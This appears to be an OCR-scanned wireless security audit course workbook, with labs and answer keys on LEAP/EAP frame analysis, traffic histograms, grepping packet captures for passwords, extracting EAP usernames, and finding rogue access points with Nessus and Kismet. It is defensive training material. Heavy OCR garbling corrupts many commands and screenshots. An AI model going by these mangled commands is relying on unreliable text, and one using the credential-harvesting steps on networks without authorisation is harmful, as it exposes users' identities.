Answer: .007 seconds 3-18Section 3.1.3.5 Question: Select frame 1383. What is the frame control subtype? What tagged parameters are included in this management frame? Answer: The frame control subtype is 0. Tagged parameters include the network name (SSID), and supported rates. Question: Select frame number 1385. What is the frame control subtype? What field indicates if the AP can support the requested association? What value indicates a successful association request? Answer: The frame control subtype is 1. The status code in the tagged management parameters indicates the AP can support the association request with a value of 0x0000 to indicate successful association. Section 3.1.4.1 Question: Refer to frame 1. What is the version number and the type for 802.1x Authentication? Answer: Version is 1, type is | (start) Section 3.1 2 Question: Is this packet from the AP or from the wireless station? ‘Answer: This packet is from the AP (From DS is 1, BSSID matches the source address). Question: What is the value in the EAP Code field in this frame? Note the EAP Id number. Answer: The EAP Code is 1 or a "Request' message. Question: Note the 45-byte identity string that is included in this identify request frame. What device is being identified with this string? Answer: This string is identity information from the AP, and indicates the use of a Cisco AP-350 access point with the string "AP350". Section 3.1.4.3 Quest Answer: The EAP Code is 2 or a "Response" message. mn: What is the EAP Code for frame number 3? Question: What is the identity information associated with this response frame? Answer: The identity information is "jwright", the username of the authentication station, 3-19Section 3.1.4.4 Question: What is the EAP type used in frame number 4? How can you tell? Note the EAP ID number. Answer: The EAP Type in frame 4 is 17 or "LEAP", Section 3.1.4.5 Question: How does the AP associate the EAP Response in frame number 5 with the previous EAP Request frame? Answer: The ID field is consistently 33 for this exchange. Question: How long is the response data in the "Peer Challenge" portion of the frame? Answer: The peer challenge is 24 bytes as indicated by the "Count" field. Wireshark is misleading here, including the number 8 in the description of the peer challenge Section 3.1.4.6 Question: What is the status of authentication in frame number 6? Answer: The EAP code in frame 6 is "3" to indicate successful authentication. ate the EAP Request and the EAP Response in s/Failure message in frame number 6? Question: How does the AP ass previous frames with the Suc Answer: The ID field is consistently 33 for this exchange. Section 3.1.4.8 Question: Examine frame 9. What type of data is this key used to encrypt? Answer: This key is used to encrypt unicast traffic, as indicated in the Key Index field. 3-20Lab 4 - WLAN Audit Methodologies Complete the exercises in this lab to reinforce the material covered in the WLAN Audit Methodologies module. To complete these exercises, you will need the materials included in the SWAT toolkit.Lab 4-1; Identifying Encrypted Traffic Purpose: This lab will give the student hands-on experience working with a tool to generate a histogram of network traffic byte distribution Description: In this lab we will use the peaphistogram tool to assess the contents of supplied packet capture files. Each packet capture will generate a distinct view of traffic byte distribution in a traffic histogram that can be used to assess the contents of the data as encrypted or unencrypted. 4.1.1, Examine Peaphistogram Options The peaphistogram tool is a short Per! script that accepts a libpcap files as an input and generates a report based on the byte distribution observed in the file. The output report is read by the GNUplot software to generate images from a given data set. GNUplot is a graphing tool used for a wide variety of functions and is included in the lab CD. Change to the directory where the peaphistogram software is and run the tool with no parameters to see usage information. # cd /tmp/lab4/peaphistogram # pwd [tmp/Lab4/pcaphistogran ¥ 1s cepturel.dump capture3.dump capture5.dump gnuplot capture2.dump captured.dump captures.dunp pcaphistogram.pl ¥ ./peaphistogram.pl peaphistogram: Generate a data file histogram of a libpcap file. usage: peaphistogram filename.dump { gnuplot gnuplot will create a histogram called filename.png # ‘We see from the file listing ("Is") that several packet capture files are included, as well as the files “gnuplot” and "peaphistogram.pl”. Running the peaphistogram tool, the example usage indicates that pcaphistogram takes one input parameter - the name of the libpeap file. Passing the output of pcaphistogram to the gnuplot tool will create a PNG image file with the same name as the libpcap input file. NOTE: Because we are executing files in the current directory, we must prefix the command with "," to indicate that the file should be run from the current directory and not from the system PATH, as shown below.4.1.2. Create a Traffic Histogram Generate a traffic histogram for the capture! dump libpcap file, as shown below. # ./pcaphistogram.pi capturel.dump | . /gnuplot ' Note that it may take several minutes to complete assessing this file as it contains over LIMB of traffic. When pcaphistogram finishes assessing the file, gnuplot will create a file named "capturel.png". We can view this capture file with the "display" utility, as shown below. 4 ls -1 captuzel.png srwer--r-- Ll reot root 2753 Sep 16 08:00 capturel.png 4 display capturel.png & a ‘The capture file should look similar to the image that follows. Pocket Payload Wietogran tor capsuret dump Packet payload histogram for "capture png”. In this example, we can see a very narrow distribution of payload bytes, indicating the presence of encrypted traffic. The X-axis indicates the byte values observed in the file in their hexadecimal representation (e.g. 0x00 to OxFF). ‘The Y-axis indicates the frequency, with the frequency of this packet capture hovering around 40,000 for each byte value. 4.1.3. Assess the Remaining Packet Capture Files Repeat the previous step for each supplied packet capture file, assessing the histogram that is created to identify if the traffic indicates encrypted or unencrypted content. The answers and traffic used to generate these captures are presented on the last page of the lab 4 materials, 4-3Lab 4-2: Assessing Plaintext Strings Purpose: Introduce the use of the Unix "strings" tool to quickly identify potential information disclosure. Description: In this lab we'll assess the contents of a supplied packet capture using the "strings" tool. This allows us to quickly identify plaintext information in a packet capture file with standard Linux tools, allowing the auditor to quickly narrow in on potential information disclosure risks. 4.2.1. Examine "strings" Options The strings tool is very simple to use, offering few command-line options. Examine the contents of the strings manual page by running "man strings", as shown below. Be sure to examine the command-line options for strings and any listed bugs. ¥ man strings 4 Question: What is the strings "-n" option used for? 4.2.2. Collecting ASCII Strings from "strings-sample.dump" Collect the strings that are present in the supplied "strings-sample.dump" file, piping the output to a file, as shown below. ¥ od /tmp/Lab4 # 1s strings-sample. dump strings-semple.dump # strings strings-sample.dump >strings-sample.txt # kedit strings-sample.txt & [21 3695 ‘i Inspect the contents of the “strings-sample.txt” file and answer the questions that follow. Quit kedit afier completing this step.Question: Are all the strings listed in the file readable? Question: What would cause unreadable strings in the file? (Hint: Check the manual page for strings, BUGS section) Question: How long are the majority of the strings that are not readable? Question: How can we eliminate many of these non-readable strings? (Hint: Consider the strings "=n" option) 4.2.3. | Focus on Longer Strings Since there are so many strings in the file that do not represent readable ASCII with a short length, we can eliminate them by assessing the file with the strings "-n" option. Note that this will eliminate any potentially informative strings that are less than the specified length, Re-create the "strings-sample.txt" file for strings that are at least 12 bytes in length, as shown below. # strings -n 12 strings-sample.cump >strings-sample. txt # kedit' strings-sample.txt & [1] 3697 ' Notice the file is now mostly readable ASCII strings, representing HTTP requests and other traffic. At over 36,000 lines however, there is still a lot of information to review. Close kedit after briefly examining the file contents. 4.2.4. Parse Strings Data We can use the Unix "grep" tool to quickly identify interesting information in the strings output file. You can use any keyword to search for potentially interesting information; we'll use the string "password" for our example. First, look at the manual page for the grep command. Identify the command that can be used with grep to force it to ignore the case of the data it searches for, matching "password", "PASSWORD", "Password", etc. # man grep fQuestion: What command can be specified with grep to perform case-insensitive searches? ‘Next, use the grep command to search for case-insensitive instances of the string "password!" in the "strings-sample.txt” file. Pipe the output of this command to the “password-grep.txt” command, as shown below. # grep -i password strings-sample.txt >password-grep.txt 4 kedit password-grep.txt & [a] 3702 t Next, open the "password-grep.txt" file with kedit. The text content of an EBay page will be seen, followed by some strings that should immediately arouse concern. Quit kedit after completing this step. Question: What strings are observed in the password-grep.txt file that are of concem? (Hint; Look for Cisco 1OS-like strings) (Hint: Lines 7 and 8) 4.2.5. Locate Corresponding Packets While the information presented by the strings tool is interesting, we really need to see the information in context to the packets that contain the strings. We can use an Wireshark display filter to locate the packets with the "contains" operator. First, open the strings-sample.dump file in Wireshark. You can start Wireshark by clicking "K > Run Command ...", enter the command "wireshark" in the Command dialog box, then click "Run". After Wireshark starts, click "File > Open” and navigate to the /tmp/lab4 folder. Wireshark will open and dissect the packet capture file, as shown below.Ble Edt View Go Coptwe analyse Stalsties Hele SRAARICR*eGiResetziHSiaa Reqst-ta-ted ‘oropet“ae-e0:fe (TA) Lacenere“Ti-ea:9t (RA) equest. Reaiest-o- 20m ironet_aoieosfe (G8) UaceneTe“f.aa.9¢ (RA) Reqeet- Requestta-2eid (03) eens te fsa: 9e (a fequst.to send Sranacact 5 onal : 30 o.meres vont S:e0:te (Fa) Liven f1as80 (MA) pF Te o0.23 OMe E Oa NT wo wo Sw 12 be Se Fd [fie ‘jonprabiictingz sample damp ioesT KE Des I[PisssO eam MO Wireshark display of packets in the strings-sample.dump file, ‘We can reference the entire contents of a packet with the "frame" display field name. Apply a display filter on the "frame" display field name with the "contains" operator, looking for the string "enable password" (Hint: Specify the display field name, the operator, then the string to match) (Hint; Surround the string to match with double-quotes) (Hint; The filter should return 1 packet) (Hint: frame contains "enable password") Scroll to the bottom of the packet detail window to see the packet content. This isn't the easiest view to read, so let's take a look at another useful Wireshark feature - "Follow TCP Stream". 4.2.6. | Reassemble Transaction By right-clicking on a frame, we can select the option to have Wireshark reassemble the entire transaction associated with one packet, and display the contents in an easy to read format.Right-click on the packet that is displayed after applying the display filter in the previous i step, then click "Follow TCP Stream". Wireshark will automatically apply a display filter to include only the packets for the selected stream, and will open the "Stream Content" dialog box, as shown below. [peecu ne ji eae Wireshark stream content representation window. In the Stream Content dialog, text that is highlighted in red represents one side of the conversation (usually the client, or initiating side), and the blue text represents the other side of the conversation (usually the server, or responding side). Inspect the stream content information presented by Wireshark and answer the questions that follow. Quit Wireshark at the end of this lab. Question: Is the configuration of a production PIX firewall revealed? Question: What is the potential impact to the organization where this information was disclosed”?Lab 4-3: Evaluating EAP Username Disclosure Purpose: Introduce a technique that can be used to assess the usernames disclosed on 802. 1x/EAP networks. Description: In this lab we will assess traffic in a supplied packet capture file to identify the usernames in multiple EAP transactions, identifying a single username that is used by multiple stations. 4.3.1. Introduction to TShark ‘TShark is a text-based Wireshark tool. Instead of providing a graphical user interface to ew the contents of packets and their dissected protocol contents, TShark displays the information in a simple text-based format. This is useful for us as auditors, since it allows us to work with protocol dissection information with other standard Unix utilities Display the contents of the file "multiple-eap. dump" in the /tmp/lab4 folder with TShark with the following command-line options. Command Argument (if any) Description option multiple-eap.dump —__Read the file "“multiple-eap.dump" as an input a Do not perform name resolution on IP addresses or MAC addresses Nv Print the packet dissection view of the packets # tehark -r multiple-eap.dump -n -V Frame 1 (28 bytes on wire, 28 bytes ceptured) Arrival Time: Sep 16, 2004 06:49:37.000000000 Time delta from previous packet: 0.000000000 seconds ‘Time since reference or first frame: 0.000000000 seconds Frame Number: 1 Packet Length: 28 bytes Capture Length: 28 bytes IEEE 802.13 ‘Type/Subtype: Data (32) Frame Control: 0x0208 (Normal) version: 0

#A tremendous amount of information will be displayed on your screen. Note that we can redirect the output of TShark to a file that we can view at a later time with kedit or other tools. Fortunately, we can apply display filters with TShark to limit the packets that are displayed. Use TShark to print the contents of the multiple-eap.dump file again, this time using the following command-line options. Command Argument (if any) Description option multiple-cap.dump Read the file "multiple-eap.dump" as an input on Do not perform name resolution on IP addresses or MAC addresses Vv Print the packet dissection view of the packets R “eapol” Apply the display filter "eapol”". Must include quotes around the display filter. # tshark ~r multiple-eap dump -n -Vv -R "eapol" Frame 9 (40 bytes on wire, 40 bytes captured) Azrival Time: Sep 16, 2004 06:49:37.000008000 Time delta from previous packet: 0.000001000 seconds Time since reference or first frame: 0.000008000 seconds Frame Number: 9 Packet Length: 40 bytes Capture Length: 40 bytes TEEE 802.11 ‘Type/Subtype: Data (32) Frame Control: 0x0108 (Normal)

+ 4.3.2. Identifying EAP Usernames Unfortunately, neither Wireshark nor TShark permit the use of display filtering on the username information in the protocol dissector. Asa workaround, we can pipe the output of the TShark protocol dissector to standard Unix utilities Identify usernames that are used for EAP authentication in the multiple-eap.dump file, using the grep command to extract only lines that include the string "Name": # tebark -r multiple-eap.dump -n -V -R “eapol” | grep Name Name (5 bytes): nthom Name (5 bytes): nthomNane (5 bytes): nthom Name (5 bytes): nthom Name (5 bytes): plynn Name (5 bytes): plynn Name (5 bytes): plynn Name (5 bytes): plynn

# In this output we have multiple instances of the same username listed. Note that this does not indicate that the same username is used for multiple stations; rather it just reflects that the username appears in multiple packets in the capture file, which is not unusual Parse the contents of the usernames in the multiple-eap.dump file again, this time passing the output of grep to the Unix "sort -u" command to generate a sorted list of unique usernames, eliminating duplicates. # tehark -r multiple-eap.dump -n -V -R Name (5 bytes): hbonn Name (5 bytes): nthom Name (5 bytes): plynn Name (6 bytes): pomith Name (7 bytes): llamont spel” | grep Name | sort -u With this command, we've identified five usernames in the multiple-eap.dump file. As part of an audit, this information should be documented as a potential information disclosure risk. Let's continue our assessment to see if any of these usernames are used by multiple stations on the network. 4.3.3. Correlate Users to MAC Addresses Even though Wireshark doesn't allow us to specify EAP usernames in display filters, we can use the "contains" operator functionality on the “eap" display field to identify frames with specific usernames. By applying a display filter that includes only a specified username, we can quickly assess the MAC addresses in use. First, open the "multipl or from the Backtrack eap.dump" capture file using Wireshark from the command-| Next, apply a display filter for the username "hbonn” on the "eap" field: eap contains “hbonn" 4-1‘This will generate list of packets that contain the string "hbonn” in the "eap" display field, as shown below. We could apply a similar filter to the "frame" display field, but itis not necessary to search the entire packet for the username string; we can speed up the display filter by limiting the search to just the "eap" field. te Eien Ge imore aree Saecs tew SeHGAGeioG@x@eSigesnvt se FS aaQ | elon ose crame eon SSSSSSSi esa | lene] | 18 o.oca7e agp, Kaen (RFESTS] Exp Response, EXP Csze mereteas (LEAP [en Bi comes Cee xP eponse, Coeesty (RRST39) 5 O.aeoes Cos ee Respoue, Teen it} (RFT) 4G Gveeones Exe ExP Response, EaPclico wireless (LEAP th 7 oloconee ise piesa EHP Request, GkPciaco Hirolen or ae o.amoe Chae ao. Exh nionse, e€P Casco Meretese (LRM) [ho 291 O-oHoe0 Chee 522 ovonoiel Glace Fespoae, feem ity (RFEDT6] * 1 apicol-Link Controt Eo Wwe wT ww 0 Oo 91 8&2 St Ge Wireshark display ofall packets with "hbonn’ in the "eap* field Note that this display includes multiple source MAC addresses. This is because the username appears in both packets from the wireless station and from the access point. We can apply an additional display filter to limit the display to packets from the client, or those packets with the To DS bit set in the frame control header: eap contains “"hbonn" and wlan.fc.tods Apply this display filter to display all packets with the usemame "hbonn" that are from wireless client systems. The packet display should appear as follows.Ble EW Wew Go Gephwe Avahze Stslce Help SRAGMA ORCS Oeeose OG ag |(Zhtmes [San canains “Rooms ond wankclods ==2——* | Erression | Wace] o soy tte [time [Sauce [Bestnaion [roel ne ree TERT 1 7 teas? — Case fee hae Balad tap —Resmees ity SS) | 73 b.cmore 2 ca te Rigoce, EaPcise musts (EAM, (oo | oD cmees chee Tergonces tect 09) | fs Dees men fen, teomity jen | 06 8.08 cso Regune, exrccivo Mireles (LEAD tor! | 7 B.smeee 30 feaiet, eaecine Wctess (EH) Hore | winemm Gucectia eeecenas90 Raspes toety (eT8) i | ie baie cetebte Eire 0 fesynce, foatty fre] ' | ios Some cases: eee so fein ica eles EAP at} ip Fane 77 fe Bites on wire, > tee eo [> opical-Line contrat et Wireshark display ofall packels trom wireless clients with “hbonn’ in the "eap" field Examine the source MAC address for each packet that is returned by the display filter. From this output, we can see that only one station with the MAC address '00:0a:8a:47:db:7b" is listed. From this analysis, we can determine that only one station in our packet capture is using the username "hbonn" for authentication, Reapply the display filter for each username that is identified in the previous step, Question: Which username(s) are used from multiple client stations? Question: What are the MAC addresses of the client stations that are sharing usernames? Question: How can an administrator use this information to enforce a policy that forbids sharing usernames?‘This completes our fourth lab exercise. Congratulations. ©Answers Section 4.1 The pcaphistogram analysis for each supplied packet capture is presented below. Capture 1 i The traffic histogram for capturel.dump indicates a very narrow distribution of traffic. This packet capture was generated by accepting a random stream of data from the Linux /dev/urandom device, encrypting the content with PGP and transmitting it over a TCP socket with Netcat, Capture 2 Peskes Paylond Histogram for conturs®.dine The traffic histogram for capture2.dump indicates a wide distribution of characters with a cluster of characters peaking near the ASCII printable character set (hex 0x61 is "a, Ox7a is "z"). This traffic was generated by transmitting an unencrypted ASCII dictionary file between two hosts over a TCP socket with Neteat. 4-15Capture 3 ‘The traffic histogram for capture3.dump indicates a relatively narrow distribution of traffic, Even though this is a narrow distribution of traffic, it does not represent encrypted content (it was kind of a trick question, sorry). This is an example ofa compressed file being transferred between two systems. Since the content is compressed to remove duplication, it can be mistaken as poorly-encrypted traffic, It is difficult to assess traffic of this type with a histogram, and may require detailed packet inspection to identify patterns that could indicate repetitive compression file headers. Capture 4 ‘The traffic histogram for capture4.dump indicates an overall wide distribution of traffic that transitions from wide to narrow byte distribution. This is an example of a large Linux kernel being transmitted between two hosts over a TCP socket using Netcat. This is a good example of a histogram to identify unencrypted traffic since the capture does not contain an obvious distribution of bytes in the printable ASCII range of characters. 4-16Capture 5 ‘The traffic histogram for captures.dump indicates a wide distribution of characters focusing around the printable ASCII character set, with a single peak near hexadecimal 0x20. This is obviously an unencrypted file, with the 0x20 byte indicating the space ("" character. This capture is the result of transmitting the Kismet source code files over a TCP socket using Netcat. Note that another seemingly anomalous character is near the Ox0a byte, indicating the presence of a significant number of carriage-return characters (Enter). Capture 6 Lashes actin ashen itn pe tan Nr fait, The traffic histogram for capture6.dump indicates a relatively narrow distribution of characters, similar to capture number 3. Unlike capture number 3, tis histogram represents the contents of encrypted traffic generated from an interactive SSH session between a Windows XP host and a Linux system. Section 4.2.2 Question: Are all the strings listed in the file readable? Answer: All strings consist of ASCII characters, but not all strings are recognizable words or phrases, 4-17Question: What would cause unreadable strings in the file? ‘Answer: Data that happens to be in the printable ASCII character set that was not transmitted as ASCII data may show up as plaintext strings. Question: How long are the majority of the strings that are not readable? ‘Answer: Many of the strings that are not readable are only 4 characters in length, Question: How can we eliminate many of these non-readable strings? Answer: The strings "-n" option allows us to specify a minimum string length. We can increase this.default value to eliminate strings that are only 4 characters in length. Section 4.2.4 Question: What strings are observed in the password-grep.txt file that are of concern? Answer: There is an encrypted Cisco PIX enable password present in this capture file. Section 4.2.5 Use the display filter: frame contains "enable password" Section 4.2.6 ‘Question: Is the configuration of a production PIX firewall revealed? ‘Answer: No, the string was present in an e-mail message from a CCIE study group discussing Cisco PIX configuration. Question: What is the potential impact to the organization where this information was disclosed? Answer: Low impact. Section 4.3.3 Question: Which username(s) are used from multiple client stations? Answer: "nthom", "Ilamont" Question: What are the MAC addresses of the client stations that are sharing usernames? Answer! nthom - 00:09:b7:13:a8:27, 00:40:96:42:bd:08 Mamont - 00:0a:8a:47:db:7b, 00:40:96:a0:4¢:5¢ Question: How can an adn sharing usernames? strator use this information to enforce a policy that forbids 4-18Answer: Regularly audit the ZAPOL authentication process to identify stations sharing usernames and lock the usernames, denying authentication.This page intentionally left blank.' Lab 5 —- Rogue Network Threats Complete the exercises in this lab to reinforce the material covered in the Rogue Network ‘Threats module. To complete these exercises, you will need the materials included in the SWAT toolkit.Lab 5-1: Identifying Rogues with Nessus Purpose: The steps in this lab gives the student hands using wired-side analysis techniques. s-on experience scanning for rogues Description: In this lab we will use the Nessus tool to perform wired-side scanning to locate a rogue access point, While this is far from a comprehensive method to locate rogues devices on a network, it can be used almost immediately when you retum to your organization to identify rogue AP threats at no cost. Always remember to get permission before launching any kind of a vulnerability scan on your organization's network. 5.1.1. Connect to the classroom network Execute the following commands from a shell prompt to connect to the SANS- ROGUEO! network: ¥ killall dheped ¥ iwconfig wlan0 essid SANS-ROGUEO1 enc off mode managed 4 dheped -d wiano At this point, your system should be connected to the SANS-ROGUEO! network. If you had trouble getting to this point, please contact a proctor or the instruetor for assistance. 5.1.2. Launch Nessus ‘Now that your system has established network connectivity, launch the Nessus vulnerability scanner. 5.1.2.1 Start the Nessus Server Initiate Nessus server from a shell prompt by running the " below: jessusd" command, as shown # nessusd -D All pluging loaded é Afier the Nessus server has started, invoke the Nessus client by running the "nessus" command, as shown below: # nessusAfter the client startup has completed, you will be presented with the Nessus login window, as shown below. =a ca = Nessus Setup client interface window 5.1.3. Login to Nessus After the Nessus client starts, you will be presented with a window requesting a login name and a password, Supply the usemame "root" and the password "tor", then click "Login". Afier clicking login you will be presented with the "SSL Setup", asking you to choose your level of SSL paranoia. Since only the local system can access the Nessus server, this connection doesn't need to be too paranoid; simply click Ok at this dialog box, then click "Yes" to accept the displayed certificate information, 5.1.4. Configure Nessus scanning options After logging into Nessus you will be presented with the "Plugins" screen, By default, Nessus will include several default plugins to identify vulnerabilities on a variety of systems. We will configure the plugins to only use the rogue access point detection plugin.Click the "Filter" button fo open the "Filter plugins ..." window. Select the "ID number" checkbox (disable the "Name" checkbox, if selected) and enter the plugin number "11026" in the "Pattern." text-box, then click OK. Click the "General" plugin family name. Next, select the "Access Point Detection” plugin to open the detail window for this plugin, as shown below. fal cat aneseennn| euinat| en, = a e Fcemcneme m Cc Sapo t oe : Seo fe 7 7 ‘Nessus plugin selection dialog ‘Access point searing plugin detail window Examine the information associated with this plugin including the dependency information, then click Close. Next, select the "Enable dependencies at runtime" checkbox. This will enable Nessus to call other plugins that are associated with the access point detection plugin (such as the SNMP scanner plugin) as needed. Next, click the "Scan Options" tab to define additional scanning characteristics. Ensure the "Safe Checks" checkbox is disabled, as this is needed to use the Nessus OS fingerprinting functionality when scanning hosts (leaving "Optimize the test" selected). Change the port-range sclection to "21-80", as shown below. This reduces the number of ports to those that are useful to the rogue AP detection plugin, helping speed-up the sean. Next, click the "Target selection” tab. In the "Target(s)" textbox, enter the IP address range for the lab network ("10.0.0.1-10.0.0.20"). DO NOT include any spaces between addresses when specifying the range. Disable the "Perform a DNS zone transfer" checkbox, as shown below.‘Nessus "Sean options" window. Nessus "Target selection" window. ( 5.1.5. Initiate the scan After configuring the required scan options, click the "Start the scan" button on the bottom of the Nessus client window. A progress bar will be displayed for each host that is scanned, as shown below. : Nessus scanning progress indicator.5.1.6. Assess the report After completing the scan, Nessus will launch the "Nessus NG Report" interface, categorizing the networks and hosts scanned, open ports and the severity of vulnerabilities identified by Nessus. Click on the appropriate subnet, host, port and vulnerability as identified by Nessus. Question: Was Nessus able to identify a potentially rogue access point on the network? Question: What information did Nessus provide about the rogue access point? Question: How could an administrator disable the access point from a remote location? Quit Nessus after assessing the report results.Lab 5-2: Examine RSSI Data Purpose: This lab will examine the collection of radio signal strength information (RSSI) in a special packet capture header. Description: RSSI information is valuable when trying to locate a rogue access point from wireless-side analysis, allowing us to identify a relative distance between a monitoring station and a transmitting device. This lab will examine the information that provided in RSSI data and how this information can be manually collected with the HostAP drivers. We'll also look at the capture information provided a WildPackets AiroPeek NX driver. 5.2.1. Configure HostAP for RSSI Collect RSSI information is collected in a special operating mode supported by the HostAP drivers. When the firmware on the wireless card receives a packet, it examines the signal levels reported by the embedded radio and reports this information to the driver. The HostAP driver formats the information in a standard packet header format that we can examine with a tool like Wireshark. Configure your HostAP drivers to report RSSI information while collecting data in monitor mode on channel 1 (2.412 GHz). Note that this exercise assumes you have the SWAT wireless card already inserted in your laptop and have a working “wlan0" interface ¥ cd /tmp/labs ¥ iwconfig wlanO mode monitor channel 1 ¥ ifconfig wland up 4 In monitor mode, HostAP will report packets received from the wireless interface without the RSS! information included. To enable RSSI data reporting, we need to use issue a separate instruction to the HastAP driver with the private parameter configuration tool (iwpriv). Execute the iwpriv command as listed below. # iwpriv wlan0 monitor 3 # Mode "3" enables reporting of RSSI data, while mode "2" will return to traditional monitor mode. Mode "0" returns the card configuration to managed/station mode.5.2.2. Start Wireshark ‘We'll use Wireshark to capture and assess the RSSI information in packets that we have collected. Start the Wireshark sniffer by clicking "K > Run Command..." to open the Run Command dialog box. Enter "wireshark" in the command text-box, then click the "Run" button, 5.2.3. _ Initiate a Packet Capture After starting Wireshark, collect some sample data from the wireless network by initiating a packet capture. Click "Capture > Start" to open the “Wireshark: Capture Options" dialog, as shown below. Click OK to start the packet capture. ‘After clicking OK, Wireshark will open the "Captured Packets" window, indicating the number and type of packets captured. After roughly 100 packets or so, click "Stop" to end the capture. Wireshark will close the "Captured Packets" window and display the contents of the packets that were captures. | | (a acne pote arn See ; wens ptf Sh a ont] [et common | fee 2 Om) Wireshark caplure options dialog Wireshark capture progress dialog 5.2.4. Assess RSSI Data In the protocol dissector view for the Wireshark capture, a new tree of information is listed as "Prism Monitoring Header". Expand this tree to display the information in this header, as shown below.DOGS Hs oOF2QQQ PHBH [Fewe A GP eine oy ree PTs et Wireshark window including Prism Monitoring Header information The "Signal:" line indicates the signal level of the packet when it was received by the wireless card, represented in hexadecimal format. The Prism? wireless cards supported by HostAP do not provide a signal measurement in decibels; rather it is a raw number in the range of 0-255. Wireshark represents this value in hexadecimal format, as in the example above where the signal measurement is "Oxd0". We can convert this value using a hexadecimal to decimal calculator or at a shell prompt with the "printf" tool as shown below. # printf "$a\n" Oxd0 208 i In this example, the signal strength of the selected packet is hexadecimal 0xd0 or decimal 208, Note that the signal information can jump with short bursts of increased or decreased signal strength information due to variations in noise levels and multipath characteristics. This is normal behavior that must be accounted for when assessing RSSI characteristics. Randomly sample the signal strength information for 5 packets with the same source MAC address, recording the information below. It may be helpful to select a single source MAC address and apply a display filter on the "wlan.sa" display field name. You may opt to skip packets that report a temporarily anomalous signal level.5.2.5. Assess RSSI Data for an Alternate Location Move your laptop to a different location and repeat the previous step. When prompted to save the previous packet capture, select "No". Record the results from the second packet capture below. Packet Number Question: What is characteristically different in the signal level between the two packet captures? 5-10Question: Does the signal level correspond to the expected results according to your relative position to the access point? * 5.2.6. Assessing RSSI in AiroPeek NX Captures RSSI information is also stored in packet captures created with the WildPackets AiroPeck NX tool, often ina friendlier format than what is reported by the HostAP drivers. Using Wireshark, clear any applied display filter by clicking the "Clear" button on the Filter toolbar. Next, open the supplied AiroPeek NX packet capture in the /tmp/lab5 folder named "airopeek-capture.ape" by clicking "File > Open". When prompted to save the capture file generated in the previous lab step, select "Continue Without Saving”. Next, navigate to the /tmp/labS folder, select the "airopeek-capture.ape" file and click "OK". Wireshark will open the capture file and present the contents as displayed below. a ee ae a HeOQVx* eS Geos HQQqr Hg xO {iene cnr are EY Wireshark capture dissecting the supplied AiroPeek NX packet capture file. The AiroPeek NX packet capture uses a proprietary file format for saving packet contents, including the signal strength indicating as a relative percentage immediately before the frame control header. Expand the "IEEE 802.11" tree to reveal the data rate, channel and signal strength information in this packet capture, Examine the signal level for several packets with the source MAC address "00:40:96:a0: 1e:82". Minor fluctuations are reported, but the relative signal level remains largely consistent. Scroll to packet 73 from source address 00:09:b7:13:a8:27. Note that the signal strength information for this source is significantly reduced from that of the previous souree. 5-11Question: What would explain the consistent difference in signal strength for these two stations? (Hint; Keep the capture source of the AiroPeck NX software in mind) (Hint: What is indicated by the relative signal level of the 00:40:96:a0: 1e:82 station?) (Hint: What is indicated by the relative signal level of the 00:09:b7:13:a8:27 station?) Exit Wireshark after completing this step.Lab 5-3: Sample RSS! with kis-snr Purpose: This lab will introduce the kis-snr tool that can be used with Kismet to automate the sampling of signal information for a given BSSID. Description: In this lab we will initiate Kismet to collect traffic on a specitic channel while reporting RSSI information, using the kis-snr script to collect and average the signal and noise information. This is a valuable technique to use when trying to document the relative signal level of a rogue device in an unknown location. 5.3.1. Launch Kismet Start Kismet by clicking "K > Backtrack > Wireless Tools > Analyzer > Kismet". Backtrack automatically select the first appropriate wireless card and start Kismet, saving the files in the root user's home directory ("/roat") 5.3.2. Select a Network BSSID Use the Kismet detail view to identify the BSSID for a selected network that is identified. Note that you will have to change the default sort order from “Autofit" (change the sort order by pressing “s", then "f" for first-seen), Note the BSSID of the selected network below: BSSID: 5.3.3. Sample Signal and Noise with kis-snr Open an XTerm window and change to the /tmp/labS/kis-snr directory, as shown below. # ed /tmp/lab5/kis-snr # pwd /tmp/lab5/kis-snr # ‘Next, launch the kis-snr tool with no options to get a list of command-line parameters. 4 ./kis~snz.pl kis-snr-pl - collect SNR date from Kismet a server. ERROR: Must specify a BSSID to monitor 5-13sag: kis-snz.pl [options] vs, ~-server HOST or HO8T1:2502 vb, --bssid 00:01:02:03:04:05 -d, --duration SECONDS [default 30] e.x. kis-snr.pl -b 00 ££:90 @.x. kis-snr.pl -s server —b 00:80:1D:F0:30:12 4 Next, test the kis-snr toal with the BSSID you selected in the previous step. ¥.Jeis-sne.pl -b 00:00:41:RG:6A789 Sampling data for 30 seconds Done Average signal level is 167.62 (MAX: 169, MIN: 167) Average noise level is 165.62 (MAK: 168, MIN: 165) Samplas: 3520 Reverting server to channel hopping. + ‘The kis-snr tool will connect to the local Kismet server and instruct the server to lock the channel number to the corresponding channel used by the specified BSSID. After sampling the data, kis-snr will revert back to channel hopping. This is demonstrated in the Kismet status window, as si Kismet status window indicating locked and unlocked channel. Next, sample data for the selected BSSID from multiple locations. Optionally, you may wish to pirouette while collecting data to obtain a better average from each location. Record the information collected with kis-snr in the boxes below. 5-14Location | BAe Serco Coe Location 2 Bere Location 3 Pre SreriNtstset tc) Location 4 Qiiestion: Does the average signal, noise and sample count reflect the relative distance to the access point? Note: Collecting signal level information in this fashion may be skewed when there is a large amount of traffic from multiple sources on the network. You can increase the accuracy of signal/noise/samples collection by increasing the kis-snr sampling time with the "-d" parameter. Quit Kismet when you are completed with this step. This completes our fifth lab exercise. Congratulations. © 5-15Answers Section 5.1.6 Question: Was Nessus able to identify a potentially rogue access point on the network? Answer: This will depend on your operating environment. In the classroom lab, at least ‘one rogue access point should be identified. Question: What information did Nessus provide about the rogue access point? Answer: This will depend on your operating environment. In the classroom lab, the node at 10.0.0.7 is identified as a rogue access point (Linksys WRT). Question: How could an administrator disable the access point from a remote location? Answer: An administrator could use the MAC address to identify the switehport that this node is connected to, and disable the access point's network connectivity by disabling the port. Section 5.2.5 Question: What is characteristically captures? the signal level between the two packet Answer: This will depend on your operating environment. In practice, the two packet ‘captures should report different signal strength values, provided the captures were taken at varying distance from the access point. The packet capture with the higher signal level ‘was taken closer to the access point. If the signal level does not differ between the two captures, you may opt to repeat this step, taking a third capture at a greater distance from the access point. Question: Does the signal level correspond to the expected results according to your relative position to the access point? Answer: This will depend on your operating environment. Factors including noise, interference and signal quality will affect this answer. Section 5.2.6 Question: What would explain the consistent difference in signal strength for these two stations? Answer: The station capturing the wireless traffic was closer to the node at 00:40:96:a0: 1e:82 than the node at 00:09:67:13:a8:27. Section 5.3.3 Question: Does tie average signal, noise and sample count reflect the relative distance to the access point?Answer: This will depend on your operating environment. In practice, kis-snr will report a higher average signal strength for a selected BSSID when the monitoring station is closer to the access point, 5-17This page 